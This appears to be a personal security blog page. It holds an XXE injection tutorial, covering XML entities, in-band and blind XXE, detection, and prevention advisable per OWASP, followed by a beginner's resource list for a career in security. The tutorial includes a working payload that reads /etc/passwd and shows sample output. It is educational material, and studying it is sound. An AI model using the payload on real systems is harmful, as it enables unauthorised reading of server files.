Penetration testing – fallinlove

What is XXE attack?

An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers/data. It often allows an attacker to interact with any backend or external systems that the application itself can access and can allow the attacker to read the file on that system. They can also cause Denial of Service (DoS) attack or could use XXE to perform Server-Side Request Forgery (SSRF) inducing the web application to make requests to other applications. XXE may even enable port scanning and lead to remote code execution

There are two types of XXE attacks: in-band and out-of-band (OOB-XXE).
1) An in-band XXE attack is the one in which the attacker can receive an immediate response to the XXE payload.

2) out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server.

What is the application vulnerable?

Applications and in particular XML-based web services or downstream integrations might be vulnerable to attack if:

The application accepts XML directly or XML uploads, especially from untrusted sources, or inserts untrusted data into XML documents, which is then parsed by an XML processor.
Any of the XML processors in the application or SOAP based web services has document type definitions (DTDs) enabled. As the exact mechanism for disabling DTD processing varies by processor, it is good practice to consult a reference such as the OWASP Cheat Sheet ‘XXE Prevention’.
If your application uses SAML for identity processing within federated security or single sign on (SSO) purposes. SAML uses XML for identity assertions, and may be vulnerable.
If the application uses SOAP prior to version 1.2, it is likely susceptible to XXE attacks if XML entities are being passed to the SOAP framework.
Being vulnerable to XXE attacks likely means that the application is vulnerable to denial of service attacks including the Billion Laughs attack.

Before we move on to learn about XXE exploitation we’ll have to understand XML properly.

What is XML?

XML (eXtensible Markup Language) is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. It is a markup language used for storing and transporting data.

Why we use XML?

XML is platform-independent and programing language independent, thus it can be used on any system and supports the technology change when that happens.
The data stored and transported using XML can be changed at any point in the time without affecting the data presentation.
XML allows validation using DTD and Schema. This validation ensures that the XML document is free form any syntax error.
XML simplifies data sharing between various systems because of its platform-independent nature. XML data doesn’t require any conversion when transferred between different systems

What are XML entities?

XML entities are a way of representing an item of data within an XML document, instead of using the data itself. Various entities are built in to the specification of the XML language. For example, the entities < and > represent the characters < and >. These are metacharacters used to denote XML tags, and so must generally be represented using their entities when they appear within data.

What is document type definition?

The XML document type definition (DTD) contains declarations that can define the structure of an XML document, the types of data values it can contain, and other items. The DTD is declared within the optional DOCTYPE element at the start of the XML document. The DTD can be fully self-contained within the document itself (known as an “internal DTD”) or can be loaded from elsewhere (known as an “external DTD”) or can be hybrid of the two.

What are XML custom entities?

XML allows custom entities to be defined within the DTD. For example:

<!DOCTYPE foo [ <!ENTITY myentity “my entity value” > ]>

This definition means that any usage of the entity reference &myentity; within the XML document will be replaced with the defined value: “my entity value”.

What are XML external entities?

XML external entities are a type of custom entity whose definition is located outside of the DTD where they are declared.

The declaration of an external entity uses the SYSTEM keyword and must specify a URL from which the value of the entity should be loaded. For example:

<!DOCTYPE foo [ <!ENTITY ext SYSTEM “http://normal-website.com” > ]>

The URL can use the file:// protocol, and so external entities can be loaded from file. For example:

<!DOCTYPE foo [ <!ENTITY ext SYSTEM “file:///path/to/file” > ]>

XML external entities provide the primary means by which XML external entity attacks arise.

Exploiting XXE

To perform an XXE injection attack that retrieves an arbitrary file from the server’s filesystem, you need to modify the submitted XML in two ways:

Introduce (or edit) a DOCTYPE element that defines an external entity containing the path to the file.
Edit a data value in the XML that is returned in the application’s response, to make use of the defined external entity.

For example, suppose a shopping application checks for the stock level of a product by submitting the following XML to the server:

<?xml version=”1.0″ encoding=”UTF-8″?>
<userinfor><name>Leiz</name></userinfor>

The application performs no particular defenses against XXE attacks, so you can exploit the XXE vulnerability to retrieve the /etc/passwd file by submitting the following XXE payload:

<?xml version=”1.0″ encoding=”UTF-8″?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM “file:///etc/passwd”> ]>
<userinfor><name>&xxe;</name></userinfor>

This XXE payload defines an external entity &xxe; whose value is the contents of the /etc/passwd file and uses the entity within the productId value. This causes the application’s response to include the contents of the file:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

NOTE:

With real-world XXE vulnerabilities, there will often be a large number of data values within the submitted XML, any one of which might be used within the application’s response. To test systematically for XXE vulnerabilities, you will generally need to test each data node in the XML individually, by making use of your defined entity and seeing whether it appears within the response.

How to find and test for XXE vulnerabilities?

The vast majority of XXE vulnerabilities can be found quickly and reliably using Burp Suite’s web vulnerability scanner.

Manually testing for XXE vulnerabilities generally involves:

Testing for file retrieval by defining an external entity based on a well-known operating system file and using that entity in data that is returned in the application’s response.
Testing for blind XXE vulnerabilities by defining an external entity based on a URL to a system that you control, and monitoring for interactions with that system. Burp Collaborator client is perfect for this purpose.
Testing for vulnerable inclusion of user-supplied non-XML data within a server-side XML document by using an XInclude attack to try to retrieve a well-known operating system file.

How to prevent XXE vulnerabilities?

preventing XXE requires:

Whenever possible, use less complex data formats such as JSON, and avoiding serialization of sensitive data.
Patch or upgrade all XML processors and libraries in use by the application or on the underlying operating system. Use dependency checkers. Update SOAP to SOAP 1.2 or higher.
Disable XML external entity and DTD processing in all XML parsers in the application, as per the OWASP Cheat Sheet ‘XXE Prevention’.
Implement positive (“whitelisting”) server-side input validation, filtering, or sanitization to prevent hostile data within XML documents, headers, or nodes.
Verify that XML or XSL file upload functionality validates incoming XML using XSD validation or similar.
SAST tools can help detect XXE in source code, although manual code review is the best alternative in large, complex applications with many integrations.

Practice

With the lab you can create the account and try it by yourself.

https://portswigger.net/web-security/xxe

————-Have nice day guys—–

After a long term, I research and choose security in my career path.

How to get started in security is a common question nowadays.It’s a first question when i chosen that path and i ask someone but nobody can answer my question. i try to research and read a lot of books, Blog… relative to security. During the time i do research, someone sent a message to me and asked the my first question. So I thought I’d rather do a blog post and would direct all those beginners to this blog post.

I’ve been in security field for 3 years now. still, there is so much to learn each and every day, I’m yet not an expert and this post is NOT an expert advice. I am just sharing, what I’ve achieved in the past 3 years and doing continuously to improve my skills.

All below list was read everyday by me and i thought it’s helpful for all people who is starting in this field:

Pentester land

Detecify

Bug bounty from medium

bug bounty note

rapid7 blog

Here is a tool list should be known.

choose one which is helpful and does it as good as you can.

http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html

Public awareness and prevention guides by Europol.

Top tips for staying secure online by the UK National Cyber Security Centre (NCSC).

Watch Your Hack by Daniel Verlaan.

Security awareness and tips by The AntiSocial Engineer.

Security for everyone by Andy Gill.

A guide to protect your digital self by Francesco Cipollone.

End user security cheatsheet by Sean Wright.

Safeonweb a security awareness site from the Belgian government.

Cybersec 101, a security awareness site for beginners.

Decent Security by SwiftOnSecurity.

Cyber aware online by Martijn Kamminga.

Information security for (investigative) journalists (Dutch and English pdf available) by Silkie Carlo and Arjen Kamphuis.

Stop Think Connect. General security awareness in different languages by STOPTHINKCONNECT.

Cybersecurity for small business by FTC

Security tips by US-CERT

My own blogs:

Better account security with multi-factor authentication

Enable two-factor authentication but don’t lose access to your accounts

RANSOMWARE

The No More Ransom website can help to get your files back when they are encrypted after a ransomware attack. This website also contains a lot of practical advice to protect against ransomware.

My own blog:

Ransomware 101: How to protect against ransomware and what to do after a ransomware attack?

BACKUPS

Easy, Cheap And Secure Backup With Google Cloud by Scott Helme

Securely backup your data: What does a good backup strategy look like? In this blog I also show a possible practical implementation.

SOFTWARE UPDATES

Why you should keep your software up to date

ONLINE SECURITY FOR CHILDREN

Help your children stay safe online

DATA BREACH DETECTION

How to monitor your data breach exposure: in this blog I describe several tools that can help to detect if your personal data is stolen.

SCAMS AND FRAUD

How to prevent online shopping fraud

Tech support scams – what you need to know

Sextortion scams – what you need to know

How to stay safe on social media

SECURITY TOOLS

Before you click a link you want to check it with a scanning tool. A few easy to use tools are urlscan.io and virustotal. Here’s a blog (in Dutch) on how to check if links are secure.

INTERNET OF THINGS (IOT) SECURITY

The security risks of internet connected devices

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Thanks for you reading!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Category: Penetration testing

XXE Attack